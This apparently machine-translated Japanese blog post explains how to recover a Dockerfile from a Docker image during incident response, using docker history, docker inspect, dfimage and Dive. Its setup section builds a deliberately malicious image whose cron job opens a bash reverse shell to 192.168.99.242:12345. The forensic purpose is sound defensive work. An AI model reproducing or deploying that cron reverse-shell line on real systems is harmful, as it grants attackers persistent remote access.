Dockerfileファイルを取得するためのDockerイメージ解析

Dockerfileファイルを取得するためのDockerイメージ解析

01. 概要

コンテナ イメージのセキュリティに関しては、特にイメージ ポイズニングによるセキュリティ インシデントが発生した場合、イメージのソースをトレースし、Dockerfile ファイルを解析することが、緊急インシデント処理の重要なステップとなります。このブログ記事では、コンテナのセキュリティにとって重要なイメージ解像度から Dockerfile を取得する方法について説明します。

02. 環境整備

Dockfile を使用して、リバウンド シェルの悪意のあるイメージを構築します。

 FROM ubuntu:20.04 RUN apt-get update &&\ apt-get install -y cron &&\ (echo '* * * * * bash -c "bash -i >& /dev/tcp/192.168.99.242/12345 0>&1"'; crontab -l )| crontab ENTRYPOINT ["cron","-f","&&"] CMD ["/bin/bash"]


03. イメージ解析Dockerfile

3.1 画像ファイル解析

イメージのメタデータ情報では、イメージの構築に使用された Dockerfile を正常に解析し、その Dockerfile の内容を取得して、イメージの構築プロセスと導入されたソフトウェア パッケージおよび構成を理解することができます。

 docker save -o test.tar test:v1.0 tar -xvf test.tar


3.2 Dockerコマンドパラメータ

指定したイメージの作成履歴を表示するには、docker history コマンドを使用します。情報の一部のみ表示可能です。すべての情報を表示するには、--no-trunc を追加できます。

 docker history test:v1.0 docker history test:v1.0 --no-trunc


docker inspect コマンドを使用して、Docker イメージの詳細情報を表示します。 --format パラメータを使用して出力情報を自分で定義し、イメージの構成情報を取得できます。

 #查看镜像的配置信息docker inspect --format='{{json .Config}}' test:v1.0

3.3 イメージ

dfimageは、イメージからDockerfileを抽出するために使用できるサードパーティのツールです。

(1)ショートカットを生成します。 dfimage を使用して、非常に詳細な Dockerfile を出力します。

 alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 test:v1.0

3.4 Dockerイメージ解析ツールDive

Dive は、Docker コンテナイメージの内部を解析・閲覧し、各層のファイルの変更内容を詳細に確認できる Docker イメージ解析ツールです。

 alias dive="docker run -ti --rm -v /var/run/docker.sock:/var/run/docker.sock wagoodman/dive" dive test:v1.0

写真

<<:  クラウドの停止中に企業は損失を回復できますか?

>>:  Dockerfile は組み込みのシェル スクリプトをサポートし、&& リンク シンボルは不要になりました。

推薦する

M247-著作権なしホスト、年間支払い11ユーロ、無制限トラフィック

一部の人にとっては、ビジネスがやや特殊で、クラックされたソフトウェアや外国貿易用の偽造品など、著作権...

江島クラウド:企業のデジタル革新を促進する普遍的な開発

デジタル時代においては、すべての人による「開発」が新たな働き方となるでしょう。ガートナーの分析による...

B2Bウェブサイト運営におけるよくある問題の分析

最近、私はB2Bウェブサイトを研究しています。その理由の1つは、孔成がこのタイプのウェブサイトの発展...

ウェブサイトタグの最適化のヒント

2018年最もホットなプロジェクト:テレマーケティングロボットがあなたの参加を待っていますウェブペー...

ウェブサイトの重みを高めるために、ウェブサイトの後の段階で外部リンクを構築するにはどうすればよいでしょうか?

ウェブサイトの外部リンクはウェブサイトのランキングに影響を与える鍵です。これはあまり説明しなくても誰...

Weiboが再び成長軌道に戻るのは難しいのでしょうか?

国内最大の「ファンが集まる場所」であるWeiboのホットな検索リストには、有名人のゴシップ、人気の映...

360は資本協力で医薬品露出を共同で推進していると報じられている

2月21日早朝のニュースでは、Jikesouと360が資本提携の可能性について協議中であると報じられ...

アリババがメイズに5億9000万ドルを投資

2月9日午前、Meizu TechnologyとAlibaba Groupは、Alibaba Gro...

簡単な分析: 新規サイトの早期最適化のための準備作業と重要なポイント

会社が新しいウェブサイトを引き継ぐとき、私たちは何をすべきでしょうか? どのように始めるべきでしょう...

ウェブサイトのコンテンツページの包含を増やすためのヒント

Baiduアルゴリズムの調整により、ますます多くのウェブサイトが、疑似オリジナルコンテンツや収集コン...

タオバオとJD.comの2大物流モデルが競争:セルフコレクションが将来の戦場に

民生用宅配便会社の本性が、中国人民解放軍の処罰によって明らかにされたようだ。 「タオバオシステム」が...

重複ページが大量にある場合の症状

検索エンジンによるインデックス作成を容易にするために、URL を静的または疑似静的に設定することがよ...

分散からマイクロサービスまでのアーキテクチャの解読: Kubernetes マイクロサービス プラットフォームの詳細な調査

Kubernetesマイクロサービスプラットフォームを詳しく見るKubernetesの概念と機能アー...

ギャップはどこにあるのでしょうか?中国とアメリカのクラウドコンピューティングベンダー間の競争を技術と市場の観点から見る

ZTE事件以来、米中貿易戦争が激化するなか、「チョークポイント」という言葉が頻繁に聞かれるようになっ...

UCloudの新製品UDBCPが発売

近年、国はセキュリティレベルの保護評価への関心を継続的に高めており、セキュリティレベルの保護に関連す...